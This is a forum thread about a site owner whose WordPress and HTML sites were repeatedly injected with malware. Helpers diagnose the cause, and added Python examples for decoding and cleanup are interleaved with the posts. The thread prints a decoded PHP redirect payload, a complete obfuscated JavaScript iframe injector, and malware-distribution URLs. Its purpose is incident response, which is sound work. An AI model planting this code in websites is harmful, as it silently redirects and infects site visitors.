
I've a keylogger and can't get rid of it

  • 14-02-2012 10:41pm
    #1
    Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭


    I've somehow got a keylogger on my PC.

    It keeps accessing my FTP (2 different hosting accounts with different companies) and installing badware/phishing sites etc. on my domains.

    It installs this code into the index pages and sometimes other pages
    <?php	 	eval(base64_decode("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"));
    /**
    

    This happened a few months ago on one of my servers. I changed all the passwords etc .. ran virus scans etc but I must not have removed it.

    What is the best thing to do apart from formatting the HDD ?

    I'm running malwarebyte now but what else ?


Comments

  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I've a few WordPress sites and they have put this code on every single page!! Sometimes more than once!


  • Registered Users, Registered Users 2 Posts: 3,568 ✭✭✭ethernet


    NeVeR wrote: »
    I've a few WordPress sites and they have put this code on every single page!! Sometimes more than once!

    Yip. Best to edit it out of the template.

    That base64 reads as follows:

    [PHP]
    // Decoded payload. It runs on every page load; a visitor arriving from a
    // search engine or social site is bounced to the attacker's domain, while
    // anyone typing the URL directly (the site owner) sees the normal page.
    // The $_SERVER[...] index names were eaten by the forum's [] markup and
    // are restored here from the variable names.
    error_reporting(0);                       // suppress warnings that could reveal it
    $qazplm = headers_sent();
    if (!$qazplm) {
        $referer = $_SERVER['HTTP_REFERER'];
        $uag     = $_SERVER['HTTP_USER_AGENT'];
        if ($uag) {                           // skip clients that send no User-Agent
            if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler")
                or stristr($referer, "gogo") or stristr($referer, "live.com") or stristr($referer, "aport")
                or stristr($referer, "nigma") or stristr($referer, "webalta") or stristr($referer, "begun.ru")
                or stristr($referer, "stumbleupon.com") or stristr($referer, "bit.ly") or stristr($referer, "tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/", $referer)
                or preg_match("/google\.(.*?)\/url/", $referer)
                or stristr($referer, "myspace.com") or stristr($referer, "facebook.com") or stristr($referer, "aol.com")) {
                // meant to skip cache/inurl referers; with "or" this is true almost always
                if (!stristr($referer, "cache") or !stristr($referer, "inurl")) {
                    header("Location: http://froling.bee.pl/");
                    exit();
                }
            }
        }
    }
    [/PHP]


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    How did you get that?

    Also, is there some kind of tool to edit and remove it from every page? There's over 100 pages.. I'd say close to 1000 pages infected.

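The decode ethernet did above, plus a cleaner for the "remove it from every page" question, as an added example that is not part of the thread and not anything the posters ran. The sample payload and the two sample files are constructed to match the shapes quoted in the first post (the real blob was cut from the post); the redirect domain is the one ethernet found:

```python
import base64
import os
import re
import tempfile

# The statement injected at the top of every page in the thread:
#     <?php eval(base64_decode("....")); ?>
# group(1) is the base64 blob.
PAYLOAD_RE = re.compile(
    r'eval\(\s*base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;'
)
# Same statement with the PHP tags the injector may wrap around it:
# group(1) "<?php", group(2) the blob, group(3) "?>".
INJECT_RE = re.compile(r'(<\?php[ \t]*)?' + PAYLOAD_RE.pattern + r'[ \t]*(\?>)?')
LOCATION_RE = re.compile(r'header\(\s*["\']Location:\s*([^"\']+)["\']', re.I)


def extract_payloads(source):
    """Decode every eval(base64_decode(...)) blob in a file's text (what ethernet did by hand)."""
    return [base64.b64decode(b).decode("utf-8", "replace") for b in PAYLOAD_RE.findall(source)]


def redirect_targets(decoded_php):
    """URLs the decoded payload sends visitors to via header('Location: ...')."""
    return LOCATION_RE.findall(decoded_php)


def strip_injection(source):
    """Return (cleaned_text, number_removed).

    Plain HTML pages get the injector's own "<?php ... ?>" wrapper, so the whole
    thing goes. In WordPress index.php the statement rides on the file's own
    opening "<?php" tag (see the first post), so that tag is kept.
    """
    def repl(m):
        opened, closed = m.group(1), m.group(3)
        if opened and not closed:
            return opened.rstrip(" \t")
        return ""
    return INJECT_RE.subn(repl, source)


def clean_tree(root, exts=(".php", ".html", ".htm"), dry_run=True):
    """Walk root and strip the injection from every matching file.

    Returns {path: removed_count}. Run with dry_run=True first and keep a
    backup of the tree (infection and all) before writing anything.
    """
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            cleaned, n = strip_injection(text)
            if n:
                hits[path] = n
                if not dry_run:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return hits


# Constructed sample payload shaped like the one decoded above (not the real blob,
# which was cut from the post); the target domain is the one ethernet found.
SAMPLE_PAYLOAD = (
    'error_reporting(0);\n'
    'if (!headers_sent()) {\n'
    '  $referer = $_SERVER["HTTP_REFERER"];\n'
    '  if (stristr($referer, "google") or stristr($referer, "bing")) {\n'
    '    header("Location: http://froling.bee.pl/");\n'
    '    exit();\n'
    '  }\n'
    '}\n'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
# The two file shapes from the thread: a WordPress index.php and a plain HTML page.
SAMPLE_INDEX_PHP = ('<?php\t\teval(base64_decode("' + SAMPLE_B64 + '"));\n'
                    '/**\n * Front to the WordPress application.\n */\n')
SAMPLE_HTML = '<?php eval(base64_decode("' + SAMPLE_B64 + '"));?><html><body>ok</body></html>'


def demo():
    """Build a throwaway tree with both samples, decode, then clean it."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "blog"))
        with open(os.path.join(root, "blog", "index.php"), "w") as fh:
            fh.write(SAMPLE_INDEX_PHP)
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write(SAMPLE_HTML)
        targets = [redirect_targets(p) for p in extract_payloads(SAMPLE_INDEX_PHP)]
        before = clean_tree(root)            # dry run: which files, how many hits
        clean_tree(root, dry_run=False)      # write cleaned files back
        after = clean_tree(root)             # nothing left to remove
        return targets, len(before), len(after)


if __name__ == "__main__":
    print(demo())   # ([['http://froling.bee.pl/']], 2, 0)
```

Point clean_tree at the document root of a hosting account only after taking a full backup; the dry run lists every file that would be touched, and a second dry run after the real pass should come back empty. This strips the injected statement only; it does not find the hole it came in through, which is the point the later replies make.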

  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Oh, found out how you got that..

    What can I use to give my PC the best scan?


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I just ran the latest Trojan Remover and it came back with nothing !

    Going to do a big scan now.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    If you're using Windows,

    download the USB version of SuperAntiSpyware and then go get HijackThis

    throw onto a USB key.

    restart in safe mode

    run both utilities (for HijackThis, save the log file to the USB key)

    from a different machine, analyze the HijackThis logfile at:
    http://www.hijackthis.de/


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Just wondering, why do I need a different PC to check it?

    I'll try this when i get home.

    I do have full access to my normal PC, it's just my FTP files they are being targeted.. and I'm sure some other stuff as well.

    Thanks i'll try this when i'm home.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    because you will have run HijackThis with the PC running in safe mode.. where nothing runs unless you tell it to, so it would be better not to go browsing the internet (assuming you've selected safe mode with networking) with your AV/AM disabled. You could restart the PC normally, check the log file and then go and manually edit the registry but that would be an unnecessary risk and not advisable, or you could boot back into safe mode, run HijackThis again and see if you can remember 100% which registry key the log file website said was bad and which one was ok but not advised. Then of course you've got the reg keys that were marked bad by users but are actually ok applications if you know they are there and the users just took a disliking to them. Also, you have to assume that whatever infection it is does not have the extremely unusual characteristic of moving its registry info on reboot or renewing any browser/dll hooks which would change the result picked up in HijackThis.

    you might not want to restart because you should have hijackthis open while you check the report at the URL i gave and you can easily find the correlating tickbox to remove the registry key that is being reported as bad (note this is editing the registry so *ONLY* elect to remove registry keys you know are bad. best bet if you are unsure is find more information about the program/key online - which is better to do with hijackthis open so you can cross reference).

    I'm not being smart here but if you aren't familiar with anti-virus / anti-malware the best advice I can give you is get a friend or relative with tech support experience to do this for you or drop your PC in to a local computer repair company and ask them to do a clean up. Oh, and make a back up! (full system, infection and all).

    on a side note: how did you come to the conclusion that you have a virus, and more specifically a keylogger? (how do you know its on your PC and not on the webserver - buried in the basic template you use?)


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    thanks for the reply.

    My FTP account on 2 different hosting accounts (they are in two totally different counties) both were accessed and this code uploaded to every page on my server: over 40 websites, 1000s of pages.

    Also they uploaded folders with credit card phishing schemes - I only found out about them when 2 different banks emailed me.

    Google marked my sites as malicious and I had to go through a few steps to remove the badware and get Google to review them so they can be listed again.

    The 1st case happened about 2 months ago on 1 server - I removed all the files and did a total PC scan using malwarebytes. I thought I got everything out of there but yesterday one of my sites went down on my second server - I've about 20 domains on this one.. and again every page had this code in it...

    I can only assume they keylogged my FTP details.

    The sites that were affected were mainly WordPress sites.. but also some normal HTML sites.

    Funny thing is the support guy on my hosting account said there were no logins from anywhere other than my location... so I've no idea really.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    LoLth wrote: »

    I'm not being smart here but if you aren't familiar with anti-virus / anti-malware the best advice I can give you is get a friend or relative with tech support experience to do this for you or drop your PC in to a local computer repair company and ask them to do a clean up. Oh, and make a back up! (full system, infection and all).

    Funny thing is I am.. I'm the guy my friends all give their PCs/laptops to fix.. and I do get them fixed.. But I've never had a keylogger before.. and never anything accessing my FTP.

    It's normally just a worm / virus etc

    I've used HijackThis loads of times when a browser hijacking occurs or something to that effect.

    I didn't know about using a second PC to check the file. It makes sense. But I didn't have a second PC/laptop to hand. I'll get my g/f's laptop later.. in work now.


  • Registered Users, Registered Users 2 Posts: 4,676 ✭✭✭Gavin


    NeVeR wrote: »
    thanks for the reply.

    My FTP account on 2 different hosting accounts (they are in two totally different counties) both were accessed and this code uploaded to every page on my server: over 40 websites, 1000s of pages.


    The sites that were affected were mainly WordPress sites.. but also some normal HTML sites.

    Funny thing is the support guy on my hosting account said there were no logins from anywhere other than my location... so I've no idea really.

    It's more likely that you are running a vulnerable version of some web based software. Do you have access to your web server logs? If you do, you can go through them to see how the attacker is getting in. Get the last modified date on your infected files and look in the log file around that date.

    Update wordpress and all your plugins as well.

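Gavin's procedure (take the mtime of the infected files, then read the access log around that time) as an added Python example, not from the thread. The log lines and the infected file are constructed; the Apache combined log format and the "src=http" heuristic for TimThumb-style remote fetches are assumptions about a typical cPanel host:

```python
import os
import re
import tempfile
from datetime import datetime, timedelta

# Signatures of the injections quoted in this thread (the PHP line in the first
# post and the numeric-array <script> posted further down). Extend as needed.
SIGNATURES = {
    "php-eval-base64": re.compile(r"eval\(\s*base64_decode\("),
    "js-sin-array": re.compile(r"Math\.sin\(3\*Math\.PI/2\)"),
}

# Apache combined access-log line (cPanel exposes these as "Raw Access Logs";
# the exact location is a hosting-specific assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_infected(root, exts=(".php", ".html", ".htm")):
    """[(path, signature_name, mtime)] for every file carrying a known injection."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                text = fh.read()
            for sig_name, sig in SIGNATURES.items():
                if sig.search(text):
                    hits.append((path, sig_name, datetime.fromtimestamp(os.path.getmtime(path))))
                    break
    return hits


def parse_log(lines):
    """Parse combined-format lines into dicts; timestamps stay naive, in the log's own zone."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stamp = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
        entries.append({"ip": m.group("ip"), "time": stamp, "method": m.group("method"),
                        "path": m.group("path"), "status": int(m.group("status"))})
    return entries


def is_suspicious(entry):
    """Writes (POST) and remote-fetch style queries (src=http...) are what to read first."""
    return entry["method"] == "POST" or "src=http" in entry["path"]


def requests_near(entries, when, window=timedelta(minutes=15)):
    """Requests within +/- window of a file's mtime, suspicious ones first, then by time."""
    near = [e for e in entries if abs(e["time"] - when) <= window]
    return sorted(near, key=lambda e: (not is_suspicious(e), e["time"]))


# Constructed log lines (documentation IPs, no real hosts); the third is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.9 - - [13/Feb/2012:22:39:40 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://203.0.113.9/x.php HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Feb/2012:22:40:55 +0000] "POST /wp-content/themes/demo/cache/external_abc.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.4 - - [13/Feb/2012:22:41:10 +0000] "GET /index.php HTTP/1.1" 200 5512 "http://www.google.ie/url?q=x" "Mozilla/5.0"
192.0.2.77 - - [13/Feb/2012:18:02:01 +0000] "GET /about/ HTTP/1.1" 200 4431 "-" "Mozilla/5.0"
"""


def demo():
    """Throwaway tree with one infected index.php whose mtime falls inside the log window."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "index.php")
        with open(path, "w") as fh:
            fh.write('<?php eval(base64_decode("QUJD"));\n')    # constructed stand-in
        stamp = datetime(2012, 2, 13, 22, 41, 3).timestamp()    # same zone as the log here
        os.utime(path, (stamp, stamp))
        entries = parse_log(SAMPLE_LOG.splitlines())
        report = []
        for p, sig, mtime in find_infected(root):
            near = requests_near(entries, mtime)
            report.append((os.path.basename(p), sig, [(e["method"], e["path"]) for e in near]))
        return report


if __name__ == "__main__":
    for name, sig, near in demo():
        print(name, sig)
        for method, path in near:
            print("   ", method, path)
```

On a real host the log timestamps and the file mtimes may be in different time zones, so confirm the offset before trusting the window. The requests worth reading first are the ones the heuristic floats to the top: a POST to a file nobody uploaded, or a theme script fetching a remote URL, right before the pages changed.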

  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    It might also be a good idea to check for rogue .htaccess files on the server with malicious redirects in them. I came across a load of these in multiple directories when dealing with a very similar problem.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    as Gavin and tricky D posted +

    do your FTP accounts share any commonalities (user/pass the same for each?). one compromised could easily lead to the other being discovered by a bot crawling through vulnerable wordpress pages. Do any of your wordpress pages link to your other website?

    while a keylogger is a possibility and should not be ruled out, it's not the only possibility, so not turning up a culprit in your scan does not necessarily mean the scan isn't doing its job (especially if you have been running the scans in normal running mode and not safe mode).


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Thanks lads. I'll check those when i get home. ( in work now )

    As for the FTP, I'm the only one that ever accesses it.

    I use cPanel - so I'm not sure if there are web server logs in there. But I will check later.

    thanks.


  • Registered Users, Registered Users 2 Posts: 10,339 ✭✭✭✭LoLth


    wasn't there a cPanel FTP vulnerability recently? I seem to remember getting an email from my hosting company about why I had to change all my passwords and why FTP was being disabled (oh, and why the new management console was horrible!)


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I didn't hear anything, but I'll look into it.


  • Registered Users, Registered Users 2 Posts: 367 ✭✭900913


    It's possible one of the accounts with the two different hosting companies was compromised first. Then they took your email and passwd hash, and cracked it (assuming they're the same passwords), logged into your email account and took all your hosting FTP/cPanel credentials.


  • Registered Users, Registered Users 2 Posts: 6,289 ✭✭✭Talisman


    Have a look on your webserver for timthumb.php - if you have a WordPress site then it's quite likely to be there, it's used to dynamically crop/resize images in many themes. There was a vulnerability found in it about 6 months ago that allowed rogue code to be uploaded to the server and executed and unfortunately not all affected themes have been updated with the fix.

    The solution is to replace the file with an updated version from the TimThumb Project.

    Details of the exploit: Zero Day Vulnerability in many WordPress Themes

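tricky D's rogue .htaccess check and Talisman's timthumb.php check together, as an added Python example that is not from the thread. The rogue and legitimate .htaccess contents and the timthumb.php stub are constructed; that TimThumb declares its version with `define ('VERSION', ...)` and that copies are sometimes renamed thumb.php are assumptions, so treat the version column as a hint and compare against the TimThumb project's current release:

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Referer-based conditions and off-site redirect targets inside an .htaccess.
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I | re.M)
TARGET_RE = re.compile(
    r"^\s*(?:RewriteRule\s+\S+\s+|Redirect(?:Match|Permanent|Temp)?\s+(?:\d{3}\s+)?\S+\s+)"
    r"(https?://\S+)",
    re.I | re.M,
)
# TimThumb's version constant, e.g. define ('VERSION', '1.34');  (assumed shape)
VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]")
TIMTHUMB_NAMES = {"timthumb.php", "thumb.php"}   # thumb.php: renamed copy (assumption)


def scan_htaccess(root, own_hosts):
    """[(path, [off-site targets], [referer conditions])] for .htaccess files redirecting off-site."""
    findings = []
    for dirpath, _, names in os.walk(root):
        if ".htaccess" not in names:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, errors="replace") as fh:
            text = fh.read()
        targets = [u for u in TARGET_RE.findall(text) if urlparse(u).hostname not in own_hosts]
        if targets:
            findings.append((path, targets, COND_RE.findall(text)))
    return findings


def find_timthumb(root):
    """[(path, version_or_None)] for every TimThumb copy under root, theme directories included."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower() in TIMTHUMB_NAMES:
                path = os.path.join(dirpath, name)
                with open(path, errors="replace") as fh:
                    m = VERSION_RE.search(fh.read())
                found.append((path, m.group(1) if m else None))
    return found


# Constructed contents. The rogue file mirrors the PHP payload decoded earlier in
# the thread: only search-engine referrals get bounced, to the same domain.
ROGUE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule .* http://froling.bee.pl/ [R=302,L]
"""
LEGIT_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.com$
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""
TIMTHUMB_STUB = "<?php\ndefine ('VERSION', '1.32');\n// ... rest of the script\n"


def demo():
    """Throwaway tree: a legitimate root .htaccess, a rogue one buried in a theme cache dir,
    and one timthumb.php. Paths are returned relative to the root."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "demo")
        os.makedirs(os.path.join(theme, "cache"))
        with open(os.path.join(root, ".htaccess"), "w") as fh:
            fh.write(LEGIT_HTACCESS)
        with open(os.path.join(theme, "cache", ".htaccess"), "w") as fh:
            fh.write(ROGUE_HTACCESS)
        with open(os.path.join(theme, "timthumb.php"), "w") as fh:
            fh.write(TIMTHUMB_STUB)
        rel = lambda p: os.path.relpath(p, root).replace(os.sep, "/")
        rogue = [(rel(p), t, c) for p, t, c in scan_htaccess(root, {"example.com", "www.example.com"})]
        thumbs = [(rel(p), v) for p, v in find_timthumb(root)]
        return rogue, thumbs


if __name__ == "__main__":
    rogue, thumbs = demo()
    for path, targets, conds in rogue:
        print("rogue .htaccess:", path, "->", targets, "when referer matches", conds)
    for path, version in thumbs:
        print("timthumb:", path, "version", version)
```

Pass scan_htaccess the hostnames your sites legitimately redirect to (www/non-www canonicalisation is the usual false positive); anything left is a redirect you did not write. Every timthumb.php the second function lists is a copy to replace, not just the one in the active theme, since an unused theme's copy is still reachable by URL.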

  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    Talisman where would i find that file. I had a look in a few folders but couldn't see it.

    But today I come with a new problem

    The following code is now being placed in all my index pages across all my sites ( on the same server )
    <script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57.5,50,59,60,60,52,57,58.5,22,48.5,51,47.5,54,50.5,49.5,51.5,55,22,54,47.5,53.5,49.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f+'C'+'ode'](-h*(1+n[j]));}q=ss;e(q);</script>

    I delete it and within a few minutes it is back !!

    I am working on ways to improve my wordpress sites security. But I have to find the source of this problem. It's wrecking my head.

    Has anyone seen this code before and know how to find whatever is reposting it?

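What that <script> does, as an added Python example (not from the thread): the loop builds each character as String.fromCharCode(-h*(1+n[j])) with h = 2*sin(3π/2) = -2, then evals the result. The block below carries only the first 48 numbers of the array from the post; feed decode_script the whole <script> (joined back onto one line) to read the second stage, which inserts a hidden iframe and its src URL. SAMPLE_SCRIPT is a constructed wrapper around that prefix:

```python
import math
import re

# The first 48 entries of the n=[...] array in the post above (the script decodes
# the whole array the same way; the full copy is in the post).
SAMPLE_ARRAY = [3.5, 3.5, 51.5, 50, 15, 19, 49, 54.5, 48.5, 57.5, 53.5, 49.5, 54, 57, 22, 50.5,
                49.5, 57, 33.5, 53, 49.5, 53.5, 49.5, 54, 57, 56.5, 32, 59.5, 41, 47.5, 50.5, 38,
                47.5, 53.5, 49.5, 19, 18.5, 48, 54.5, 49, 59.5, 18.5, 19.5, 44.5, 23, 45.5, 19.5, 60.5]

ARRAY_RE = re.compile(r"\bn=\[([\d.,\s]+)\]")        # the array literal inside the <script>
URL_RE = re.compile(r"https?://[^\s'\"<>]+")          # where the decoded stage points


def decode_array(values):
    """Undo the script's own loop: h = 2*sin(3*pi/2) = -2, so code = -h*(1+n[j]) = 2*(1+n[j])."""
    h = 2 * math.sin(3 * math.pi / 2)
    return "".join(chr(round(-h * (1 + v))) for v in values)


def decode_script(script_text):
    """Pull the n=[...] array out of a captured <script> block and decode it."""
    m = ARRAY_RE.search(script_text)
    if not m:
        raise ValueError("no n=[...] array found")
    values = [float(x) for x in m.group(1).split(",") if x.strip()]
    return decode_array(values)


def embedded_urls(decoded):
    """URLs referenced by the decoded stage (the hidden iframe's src, for the full array)."""
    return URL_RE.findall(decoded)


# Constructed stand-in for a captured <script>, carrying only the 48-entry prefix.
SAMPLE_SCRIPT = ("h=2*Math.sin(3*Math.PI/2);n=["
                 + ",".join(str(v) for v in SAMPLE_ARRAY)
                 + "];for(i=0;i-n.length<0;i++){}")

if __name__ == "__main__":
    stage2 = decode_script(SAMPLE_SCRIPT)
    print(repr(stage2))        # "\t\tif (document.getElementsByTagName('body')[0]){"
    print(embedded_urls(stage2))
```

The decoded text is the real indicator to search for: the iframe's destination tells you which domain to block and which log lines to look for, and the array itself (or the Math.sin(3*Math.PI/2) prefix) is a stable signature to grep every page for, which is how the file-scanning example above catches it.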

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q




  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    So from those links it appears a plugin is causing this to happen.

    How can I tell which one?

    Also, these sites are a few months old, why is it only happening now?

    I'll try those steps tomorrow. As i've no time today.

    thanks.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    It might be a new WordPress vulnerability using old malware code. I haven't read into it too much, but that's why you may only be seeing it now.

    But I think you should pick strong credentials and attempt that removal guide. Most likely it's able to spread itself if your .php files are writable.

    I think you can make use of .htaccess files to protect admin pages of WordPress so you can only access these pages from certain IPs.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    A report of one site suffering from similar. I'm sure you can scan your website using this malware scanning site below:
    http://sitecheck.sucuri.net/results/vigrxonline.net

    suggests this malware infection:
    http://sucuri.net/malware/malware-entry-mwjs160
    Domains distributing malware:

    hxxp://vvesek.freetcp.com/i/i.php?go=
    (many others)
    You can see the end of the URL "i.php?go=1" is similar to the link in the code of the unpacked/de-obfuscated JavaScript in the link I posted above.

    Hints that maybe passwords on your local machine may have been stolen. I suggest you try to clean up your PC/laptop first before proceeding to cleaning the WordPress blog.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I've looked at WPScan but have no idea how to use it.

    I take it you need root access or something ?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Did you try any of the suggestions in the posts above?


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    I've backed up my databases and I've just purchased a new hosting account.

    On my infected server I've really only 2 sites I care about.

    So when I am about to start them up I'll do a full scan of my PC again.. I do one every day.. What should I be using.. I use Malwarebytes at the moment.

    Also I will be using a fresh install of WordPress and only installing verified plugins.

    Also a question I had. I made backups of the 2 databases using PHPMYADMIN.

    Would these backups carry the virus over to the new server/hosting ?

    I will also be using better passwords. I am to blame for using default ones :( So from now on they will be a lot different.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    NeVeR wrote: »
    I've backed up my databases and I've just purchased a new hosting account.

    On my infected server I've really only 2 sites I care about.

    So when I am about to start them up I'll do a full scan of my PC again.. I do one every day.. What should I be using.. I use Malwarebytes at the moment.

    Try updating Malwarebytes and do a scan in safe mode.

    Also I will be using a fresh install of WordPress and only installing verified plugins.

    Also a question I had. I made backups of the 2 databases using phpMyAdmin.

    Would these backups carry the virus over to the new server/hosting?

    It's possible, but I think it's more likely that your .php and .html files are infected.

    I will also be using better passwords. I am to blame for using default ones :( So from now on they will be a lot different.


    See my replies inline above.


  • Registered Users, Registered Users 2 Posts: 5,356 ✭✭✭NeVeR


    thanks.

    So I take it the backup doesn't have PHP and HTML files in it.. never had this problem before so I've never restored a backup etc.

